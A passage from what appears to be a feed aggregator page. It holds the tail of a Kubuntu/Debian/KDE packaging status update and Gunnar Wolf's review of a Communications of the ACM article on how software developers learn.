<li>I have added several more apparmor profiles for packages affected by <a href="https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844">https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844</a></li>
<li>I have aligned our meta package to adhere to <a href="https://community.kde.org/Distributions/Packaging_Recommendations">https://community.kde.org/Distributions/Packaging_Recommendations</a> and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!</li>
</ul>
<p>We have a branding contest! Please do enter, there are some exciting prizes <a href="https://kubuntu.org/news/kubuntu-graphic-design-contest/">https://kubuntu.org/news/kubuntu-graphic-design-contest/</a></p>
<p><strong>Debian:</strong></p>
<p>I have uploaded to NEW the following packages:</p>
<ul>
<li>kde-inotify-survey</li>
<li>plank-player</li>
<li>aura-browser</li>
</ul>
<p>I am currently working on:</p>
<ul>
<li>alligator</li>
<li>xwaylandvideobridge</li>
</ul>
<p><strong>KDE Snaps:</strong></p>
<p>KDE applications 23.08.5 have been uploaded to Candidate channel, testing help welcome. <a href="https://snapcraft.io/search?q=KDE">https://snapcraft.io/search?q=KDE</a> I have also working on bug fixes, time allowing.</p>
<p>My continued employment depends on you, please consider a donation! <a href="https://kubuntu.org/donate/">https://kubuntu.org/donate/</a></p>
<p>Thank you for stopping by!</p>
<p>~Scarlett</p>2024-02-23T11:42:51+00:00sgmooreGunnar Wolf: 10 things software developers should learn about learning
https://gwolf.org/2024/02/10-things-software-developers-should-learn-about-learning.html
<blockquote>
This post is a review for <a href="https://www.computingreviews.com/">Computing Reviews</a>
for <em><a href="https://cacm.acm.org/magazines/2024/1/278891-10-things-software-developers-should-learn-about-learning/fulltext">10 things software developers should learn about learning</a></em>
, a article
published in <em><a href="https://www.computingreviews.com/review/review_review.cfm?review_id=147713">Communications of the ACM</a></em>
</blockquote>
<p>As software developers, we understand the detailed workings of the different components of our computer systems. And–probably due to how computers were presented since their appearance as “digital brains” in the 1940s–we sometimes believe we can transpose that knowledge to how our biological brains work, be it as learners or as problem solvers. This article aims at making the reader understand several mechanisms related to how learning and problem solving actually work in our brains. It focuses on helping expert developers convey knowledge to new learners, as well as learners who need to get up to speed and “start coding.” The article’s narrative revolves around software developers, but much of what it presents can be applied to different problem domains.</p>
<p>The article takes this mission through ten points, with roughly the same space given to each of them, starting with wrong assumptions many people have about the similarities between computers and our brains. The first section, “Human Memory Is Not Made of Bits,” explains the brain processes of remembering as a way of strengthening the force of a memory (“reconsolidation”) and the role of activation in related network pathways. The second section, “Human Memory Is Composed of One Limited and One Unlimited System,” goes on to explain the organization of memories in the brain between long-term memory (functionally limitless, permanent storage) and working memory (storing little amounts of information used for solving a problem at hand). However, the focus soon shifts to how experience in knowledge leads to different ways of using the same concepts, the importance of going from abstract to concrete knowledge applications and back, and the role of skills repetition over time.</p>
<p>Toward the end of the article, the focus shifts from the mechanical act of learning to expertise. Section 6, “The Internet Has Not Made Learning Obsolete,” emphasizes that problem solving is not just putting together the pieces of a puzzle; searching online for solutions to a problem does not activate the neural pathways that would get fired up otherwise. The final sections tackle the differences that expertise brings to play when teaching or training a newcomer: the same tools that help the beginner’s productivity as “training wheels” will often hamper the expert user’s as their knowledge has become automated.</p>
<p>The article is written with a very informal and easy-to-read tone and vocabulary, and brings forward several issues that might seem like commonsense but do ring bells when it comes to my own experiences both as a software developer and as a teacher. The article closes by suggesting several books that further expand on the issues it brings forward. While I could not identify a single focus or thesis with which to characterize this article, the several points it makes will likely help readers better understand (and bring forward to consciousness) mental processes often taken for granted, and consider often-overlooked aspects when transmitting knowledge to newcomers.</p>2024-02-23T01:56:19+00:00Gunnar Wolf